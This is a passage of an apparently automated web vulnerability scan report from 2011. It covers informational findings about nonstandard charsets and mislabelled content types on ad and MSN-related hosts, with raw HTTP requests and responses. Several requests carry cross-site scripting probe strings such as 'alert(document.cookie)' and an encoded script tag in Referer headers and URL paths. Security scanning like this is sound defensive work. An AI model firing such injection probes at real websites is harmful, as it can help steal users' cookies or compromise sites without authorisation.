<html><head><title>Error</title></head><body>The system cannot find the file specified.
</body></html>

33. HTML uses unrecognised charset previous next
There are 3 instances of this issue:

http://ccc01.opinionlab.com/o.asp
https://secure.opinionlab.com/ccc01/comment_card.asp
https://secure.opinionlab.com/ccc01/o.asp

Issue background

Applications may specify a non-standard character set as a result of typographical errors within the code base, or because of intentional usage of an unusual character set that is not universally recognised by browsers. If the browser does not recognise the character set specified by the application, then the browser may analyse the HTML and attempt to determine which character set it appears to be using. Even if the majority of the HTML actually employs a standard character set such as UTF-8, the presence of non-standard characters anywhere in the response may cause the browser to interpret the content using a different character set. This can have unexpected results, and can lead to cross-site scripting vulnerabilities in which non-standard encodings like UTF-7 can be used to bypass the application's defensive filters.

In most cases, the absence of a charset directive does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

33.1. http://ccc01.opinionlab.com/o.asp previous next

Summary

Severity:	Information
Confidence:	Tentative
Host:	http://ccc01.opinionlab.com
Path:	/o.asp

Issue detail

The response specifies that its MIME type is HTML. However, it specifies a charset that is not commonly recognised as standard. The following charset directives were specified:

UTF-16
UTF-8

Request

GET /o.asp?id=swHtlTXj HTTP/1.1
Host: ccc01.opinionlab.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

33.2. https://secure.opinionlab.com/ccc01/comment_card.asp previous next

Summary

Severity:	Information
Confidence:	Tentative
Host:	https://secure.opinionlab.com
Path:	/ccc01/comment_card.asp

Issue detail

The response specifies that its MIME type is HTML. However, it specifies a charset that is not commonly recognised as standard. The following charset directives were specified:

UTF-16
UTF-8

Request

GET /ccc01/comment_card.asp HTTP/1.1
Host: secure.opinionlab.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

33.3. https://secure.opinionlab.com/ccc01/o.asp previous next

Summary

Severity:	Information
Confidence:	Tentative
Host:	https://secure.opinionlab.com
Path:	/ccc01/o.asp

Issue detail

The response specifies that its MIME type is HTML. However, it specifies a charset that is not commonly recognised as standard. The following charset directives were specified:

UTF-16
UTF-8

Request

GET /ccc01/o.asp?ID=WpkpVtTB HTTP/1.1
Host: secure.opinionlab.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

34. Content type incorrectly stated previous next
There are 123 instances of this issue:

http://ad.doubleclick.net/clk
http://ad.wsod.com/embed/457d7d7cd3cd82d66ba00fc48f756260/45.0.js.300x250/1296350884**
http://ad.wsod.com/embed/457d7d7cd3cd82d66ba00fc48f756260/45.0.js.300x250/Insert_Random_Number
http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1110508137
http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1296392426**
http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1296392449**
http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1296410362**
http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1478181591
http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1798982473
http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296350847**
http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296350884**
http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296392206**
http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1394606125
http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/842662894
http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/993020147
http://ak.c.ooyala.com/d0MGgwMjrtm0rSeX9bTc29IpE0zQQ1Rj/hsDN-m_bJJsXh8PiFhxJgLZO7aYuQRy7
http://amch.questionmarket.com/adsc/d775684/10/38973908/decide.php
http://amch.questionmarket.com/adscgen/st.php
http://api.bit.ly/shorten
http://ar.voicefive.com/b/rc.pli
http://b.rad.redacted/ADSAdClient31.dll
http://bs.serving-sys.com/BurstingPipe/adServer.bs
http://cartoonblog.msnbc.redacted/_vine/printer
http://content.pulse360.com/42EBFC62-1F4E-11E0-AB70-41F5E4064C68
http://content.pulse360.com/517F9430-C0FA-11DF-831B-94A93FF5047F
http://context3.kanoodle.com/cgi-bin/context.cgi
http://engine2.adzerk.net/z/8277/adzerk1_2_4_43,adzerk2_2_17_45
http://engine2.adzerk.net/z/8277/adzerk2_2_17_45
http://english.aljazeera.net/Media/ver2/Images/1pximage.png
http://english.aljazeera.net/Services/IncludePart/
http://english.aljazeera.net/Services/IncludePart/LevelOne/
http://geo.eyewonder.com/
http://i1.silverlight.net/avatar/anonymous.jpg
http://i3.silverlight.net/avatar/anonymous.jpg
http://info.ooyala.com/info/secondary/
http://investing.money.redacted/mv/MarketStatus
http://investing.money.redacted/mv/MarketStatus/
http://investing.money.redacted/mv/RecentQuotes/
http://javadl-esd.sun.com/update/AU/map-2.0.2.4.xml
http://lib.newsvine.com/chrome/photoblog/images/footer.jpg
http://lib.newsvine.com/chrome/thelastword/images/promo_videoplayer.gif
http://local.redacted/ten-day.aspx
http://local.redacted/weather.aspx
http://redacted/inc/Views/Shared/Core/Content/js/utility.js
http://redacted/investor/StockRating/srsmain.asp
http://redacted/investor/home.aspx
http://redacted/investor/market/earncalendar/
http://redacted/investor/market/treasuries.aspx
http://redacted/investor/partsub/funds/etfperformancetracker.aspx
http://msnbcmedia.redacted/j/ap/gays
http://msnbcmedia.redacted/j/ap/missing
http://msnbcmedia.redacted/j/ap/nannies
http://msnbcmedia.redacted/j/ap/super
http://msnbcmedia.redacted/j/ap/switzerland
http://msnbcmedia.redacted/j/ap/tampa
http://offers.lendingtree.com/splitter/splitter.ashx
http://oneightyla.vo.llnwd.net/o37/live/sony/2010_11_04_BLOGGIE/video/TubeFailWin-160x90.flv
http://openchannel.msnbc.redacted/_vine/printer
http://photoblog.msnbc.redacted/_vine/printer
http://player.ooyala.com/info/primary/
http://rad.redacted/ADSAdClient31.dll
http://sas.ooyala.com/authorized
http://sas.ooyala.com/crossdomain.xml
http://services.money.redacted/QuoteService/dynamic
http://services.money.redacted/quoteservice/streaming
http://static.pulse360.com/blob/3a/2bd5ab3_7821_mimg.jpg
http://syndication.jobthread.com/jt/syndication/page.php
http://technolog.msnbc.redacted/_vine/printer
http://thelastword.msnbc.redacted/_vine/printer
http://this.content.served.by.adshuffle.com/p/kl/46/799/r/12/4/8/ast0k3n/VESIfHDf6VyGxLxswN5oXe8gB1ttrVL1UTNow8-ycNk5nkmECiF81g==/view.pxl
http://vms.redacted/vms.aspx
http://webmail.aol.com/$|http:/travel.aol.com/$|http:/netscape.aol.com/$|http:/music.aol.com/radioguide/bb/$|http:/money.aol.com/$|http:/www.aim.com/help_faq/starting_out/buddylist.adp/$|http:/www.weblogs.com/$|http:/smallbusiness.aol.com/$|http:/www.blackvoices.com/$|http:/latino.aol.com/$|.ivillage.com.*/1|www.ivillage.com/(celeb-news|entertainment-photos|tv|for-kids|video|entertainment|movies|food|recipes|table-talk|food-for-kids|food-advice|food-news|food-video
http://wrapper.g.redacted/GRedirect.aspx
http://www.bing.com/events/search
http://www.bing.com/maps/
http://www.bing.com/maps/default.aspx
http://www.bing.com/maps/explore/
http://www.bing.com/msnhomepagehistory.aspx
http://www.bing.com/news/results.aspx
http://www.bing.com/news/search
http://www.bing.com/sck
http://www.bing.com/search
http://www.bing.com/shopping
http://www.bing.com/shopping/bird-feeders/search
http://www.bing.com/shopping/content/search
http://www.bing.com/shopping/makeup/c/4259
http://www.bing.com/shopping/search
http://www.bing.com/shopping/swimwear/c/4503
http://www.bing.com/travel/
http://www.bing.com/travel/content/search
http://www.bing.com/travel/deals/cheap-flights-to-the-caribbean.do
http://www.bing.com/travel/deals/last-minute-flight-deals.do
http://www.bing.com/travel/destinations/honolulu-hawaii-hotels-hostels-motels-1002751
http://www.bing.com/videos/services/user/info
http://www.bing.com/videos/watch/video/black-rhino-celebrates-40th-birthday/ufh7y1eo
http://www.bing.com/videos/watch/video/emotional-and-surprising-journeys/17wgxnwyo
http://www.bing.com/videos/watch/video/glee-season-2-volume-1-dvd-extra-rocky-horror/5svqwfs
http://www.bing.com/videos/watch/video/news-9-makes-sure-you-know-its-snowing/1d07cesck
http://www.bing.com/videos/watch/video/rio-exclusive-films-first-two-minutes/5eq4owv
http://www.co2stats.com/propres.php
http://www.codeplex.com/site/analyticsid.aspx
http://www.facebook.com/extern/login_status.php
http://www.hoovers.com/favicon.ico
http://www.kanoodle.com/ajax/search_spy_data.html
http://www.kanoodle.com/ajax/search_spy_data_today.html
http://www.kanoodle.com/images/kanoodle-lightbulb-home.gif
http://www.newsvine.com/_action/article/emailThis
http://www.newsvine.com/_action/user/startTracking
http://www.newsvine.com/_action/user/stopTracking
http://www.newsvine.com/_vine/m2
http://www.newsvine.com/_vine/printer
http://www.polls.newsvine.com/_vine/printer
http://www.reimage.com/images/reimage.ico
http://www.reimage.com/lp/nhome/css/fonts/candelabook-webfont.woff
http://www.scientificamerican.com/assets/fonts/3739f210-118f-4d28-be3f-86746b0e6aa8-3
http://www.scientificamerican.com/assets/fonts/53a8cf2e-6421-4292-852f-a282ba53459d-3
http://www.scientificamerican.com/assets/fonts/bf15443a-6bf6-4af1-8887-d46d68cbb4b6-3
http://www.scout.com/webproxy.ashx
http://www.silverlight.net/resources/script/omniture/analyticsid.aspx
http://www.tigerdirect.com/secure/captcha/JpegImage.aspx
http://www.w3.org/TR/1999/REC-html401-19991224/strict.dtd
http://www.w3.org/TR/html4/strict.dtd
http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd

Issue background

If a web response specifies an incorrect content type, then browsers may process the response in unexpected ways. If the specified content type is a renderable text-based format, then the browser will usually attempt to parse and render the response in that format. If the specified type is an image format, then the browser will usually detect the anomaly and will analyse the actual content and attempt to determine its MIME type. Either case can lead to unexpected results, and if the content contains any user-controllable data may lead to cross-site scripting or other client-side vulnerabilities.

In most cases, the presence of an incorrect content type statement does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing a message body, the application should include a single Content-type header which correctly and unambiguously states the MIME type of the content in the response body.

34.1. http://ad.doubleclick.net/clk previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://ad.doubleclick.net
Path:	/clk

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain XML.

Request

GET /clk HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: test_cookie=CheckForPermission;

Response

HTTP/1.1 500 Error: Not a valid request
Content-Type: text/html
Content-Length: 45
Date: Sat, 29 Jan 2011 23:45:09 GMT
Server: GFE/2.0
Connection: close

<h1>Error 500 Error: Not a valid request</h1>

34.2. http://ad.wsod.com/embed/457d7d7cd3cd82d66ba00fc48f756260/45.0.js.300x250/1296350884** previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://ad.wsod.com
Path:	/embed/457d7d7cd3cd82d66ba00fc48f756260/45.0.js.300x250/1296350884**

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=UTF-8

The response states that it contains HTML. However, it actually appears to contain script.

Request

Response

34.3. http://ad.wsod.com/embed/457d7d7cd3cd82d66ba00fc48f756260/45.0.js.300x250/Insert_Random_Number previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://ad.wsod.com
Path:	/embed/457d7d7cd3cd82d66ba00fc48f756260/45.0.js.300x250/Insert_Random_Number

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=UTF-8

The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /embed/457d7d7cd3cd82d66ba00fc48f756260/45.0.js.300x250/Insert_Random_Number?click=Insert_Click_Track_URL HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:47:27:7:0:32725:1294844800:B2; u=4d2cdd9abba1d; i_1=33:353:23:3:0:38345:1296350848:L|46:572:479:0:0:37754:1295635392:L|33:971:560:0:0:33209:1295378828:B2

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sun, 30 Jan 2011 01:28:04 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 1499

   function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash"].enabledPlugin){
               return (navigator.plugins["Shockwave Flash 2.0"] || navigator.plugins["Shockwave Flash"]).descr
...[SNIP]...

34.4. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1110508137 previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://ad.wsod.com
Path:	/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1110508137

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=UTF-8

The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1110508137?click=http://g.redacted/_2AD0003L/97000000000044962.1?!&&PID=8015235&UIT=G&TargetID=8231208&AN=1110508137&PG=INV4QD&ASID=de8164d050b942d8a816e5fd11a9275a HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://moneycentral.msn.com/investor/charts/chartdl.aspx?symbol=indu22b72%22;alert(document.cookie)//2badde9cef5
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:45:5:7:0:38345:1296350886:L|8:47:27:7:0:32725:1294844800:B2; u=4d2cdd9abba1d; fp=599362::7:IN:::1296392421:1:33; i_1=33:1391:835:95:0:34115:1296392421:B2|33:353:516:3:0:34115:1296392207:B2|33:1391:835:95:0:34115:1296392206:B2

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sun, 30 Jan 2011 13:00:26 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 1653

   function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash"].enabledPlugin){
               return (navigator.plugins["Shockwave Flash 2.0"] || navigator.plugins["Shockwave Flash"]).descr
...[SNIP]...

34.5. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1296392426** previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://ad.wsod.com
Path:	/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1296392426**

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=UTF-8

The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1296392426**;10,1,103;1920;1200;http%3A_@2F_@2Fmoneycentral.redacted_@2Finvestor_@2Fcharts_@2Fchartdl.aspx_@3Fsymbol%3Dindu22b72%2522%3Balertdocument.cookie_@2F_@2F2badde9cef5?click=http://g.msn.com/_2AD0003L/97000000000044962.1?!&&PID=8015235&UIT=G&TargetID=8231208&AN=1110508137&PG=INV4QD&ASID=de8164d050b942d8a816e5fd11a9275a HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://moneycentral.msn.com/investor/charts/chartdl.aspx?symbol=indu22b72%22;alert(document.cookie)//2badde9cef5
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:45:5:7:0:38345:1296350886:L|8:47:27:7:0:32725:1294844800:B2; u=4d2cdd9abba1d; fp=599362::7:IN:::1296392421:1:33; i_1=33:1391:835:95:0:34115:1296392421:B2|33:353:516:3:0:34115:1296392207:B2|33:1391:835:95:0:34115:1296392206:B2

Response

34.6. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1296392449** previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://ad.wsod.com
Path:	/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1296392449**

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=UTF-8

The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1296392449**;10,1,103;1920;1200;http%3A_@2F_@2Fmoneycentral.redacted_@2Finvestor_@2Fcharts_@2Fchartdl.aspx_@3Fsymbol%3Dindu22b72%2522%3Balert1_@2F_@2F2badde9cef5?click=http://g.redacted/_2AD0003L/97000000000044962.1?!&&PID=8015235&UIT=G&TargetID=8231208&AN=1798982473&PG=INV4QD&ASID=c0c03864f93b446ea43c1039d6665980 HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://moneycentral.msn.com/investor/charts/chartdl.aspx?symbol=indu22b72%22;alert(1)//2badde9cef5
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:45:5:7:0:38345:1296350886:L|8:47:27:7:0:32725:1294844800:B2; fp=599362::7:IN:::1296392421:1:33; u=4d2cdd9abba1d; i_1=33:1411:972:100:0:34115:1296392427:B2|33:1391:835:95:0:34115:1296392421:B2|33:353:516:3:0:34115:1296392207:B2

Response

34.7. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1296410362** previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://ad.wsod.com
Path:	/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1296410362**

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=UTF-8

The response states that it contains HTML. However, it actually appears to contain script.

Request

Response

34.8. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1478181591 previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://ad.wsod.com
Path:	/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1478181591

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=UTF-8

The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1478181591?click=http://g.redacted/_2AD0003L/97000000000044962.1?!&&PID=8015235&UIT=G&TargetID=8231208&AN=1478181591&PG=INV4QD&ASID=79478a5100d1453990870f5f8e2afde2 HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://moneycentral.msn.com/investor/charts/chartdl.aspx?symbol=indu22b72%22;alert(1)//2badde9cef5
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:45:5:7:0:38345:1296350886:L|8:47:27:7:0:32725:1294844800:B2; fp=599362::7:IN:::1296392421:1:33; u=4d2cdd9abba1d; i_1=33:1391:261:95:0:34115:1296410354:B2|33:1411:782:100:0:34115:1296392450:B2|33:1411:972:100:0:34115:1296392427:B2

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sun, 30 Jan 2011 17:59:22 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 1653

   function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash"].enabledPlugin){
               return (navigator.plugins["Shockwave Flash 2.0"] || navigator.plugins["Shockwave Flash"]).descr
...[SNIP]...

34.9. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1798982473 previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://ad.wsod.com
Path:	/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1798982473

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=UTF-8

The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1798982473?click=http://g.redacted/_2AD0003L/97000000000044962.1?!&&PID=8015235&UIT=G&TargetID=8231208&AN=1798982473&PG=INV4QD&ASID=c0c03864f93b446ea43c1039d6665980 HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://moneycentral.msn.com/investor/charts/chartdl.aspx?symbol=indu22b72%22;alert(1)//2badde9cef5
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:45:5:7:0:38345:1296350886:L|8:47:27:7:0:32725:1294844800:B2; fp=599362::7:IN:::1296392421:1:33; u=4d2cdd9abba1d; i_1=33:1411:972:100:0:34115:1296392427:B2|33:1391:835:95:0:34115:1296392421:B2|33:353:516:3:0:34115:1296392207:B2

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sun, 30 Jan 2011 13:00:49 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 1653

   function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash"].enabledPlugin){
               return (navigator.plugins["Shockwave Flash 2.0"] || navigator.plugins["Shockwave Flash"]).descr
...[SNIP]...

34.10. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296350847** previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://ad.wsod.com
Path:	/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296350847**

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=UTF-8

The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296350847**;10,1,103;1920;1200;http%3A_@2F_@2Fmoney.redacted_@2Finvesting_@3F4755d%2522%253E%253Cscript%253Ealert1%253C_@2Fscript%253E10ee24922f0%3D1?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8010639&UIT=G&TargetID=28253488&AN=993020147&PG=INVSRQ&ASID=b7e3b00f832b4ae1873eac83f051400a HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:47:27:7:0:32725:1294844800:B2; u=4d2cdd9abba1d; i_1=46:572:479:0:0:37754:1295635392:L|33:971:560:0:0:33209:1295378828:B2|33:971:560:0:0:37102:1294942822:L

Response

34.11. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296350884** previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://ad.wsod.com
Path:	/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296350884**

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=UTF-8

The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296350884**;10,1,103;1920;1200;http%3A_@2F_@2Fmoney.redacted_@2Finvesting_@3F4755d%2522%253E%253Cscript%253Ealert1%253C_@2Fscript%253E10ee24922f0%3D1?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8010639&UIT=G&TargetID=28253488&AN=1394606125&PG=INVSRQ&ASID=0932f0fa7bd044ce92444252d58da2c8 HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:47:27:7:0:32725:1294844800:B2; u=4d2cdd9abba1d; i_1=33:353:23:3:0:38345:1296350848:L|46:572:479:0:0:37754:1295635392:L|33:971:560:0:0:33209:1295378828:B2

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sun, 30 Jan 2011 01:28:06 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Set-Cookie: u=4d2cdd9abba1d; expires=Wed, 02-Mar-2011 01:28:06 GMT; path=/
Set-Cookie: i_1=33:353:516:3:0:38345:1296350886:L|33:353:23:3:0:38345:1296350848:L|46:572:479:0:0:37754:1295635392:L; expires=Tue, 01-Mar-2011 01:28:06 GMT; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 842

   function wsodOOBClick() {
       var i = new Image();
       i.src = 'http://g.redacted/_2AD0003L/93000000000038010.1?!&&PID=8010639&UIT=G&TargetID=28253488&AN=1394606125&PG=INVSRQ&ASID=0932f0fa7bd044ce92444252
...[SNIP]...

34.12. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296392206** previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://ad.wsod.com
Path:	/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296392206**

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=UTF-8

The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296392206**;10,1,103;1920;1200;http%3A_@2F_@2Fmoney.redacted_@2F_@2F_@3F4ae1b?click=http://g.redacted/_2AD0003L/93000000000038010.1?!&&PID=8010639&UIT=G&TargetID=28253488&AN=842662894&PG=INVSRQ&ASID=a06ba72a17b94ee896a6f183bcdee2f9 HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:45:5:7:0:38345:1296350886:L|8:47:27:7:0:32725:1294844800:B2; u=4d2cdd9abba1d; i_1=33:1391:835:95:0:34115:1296392206:B2|33:353:516:3:0:38345:1296350886:L|33:353:23:3:0:38345:1296350848:L

Response

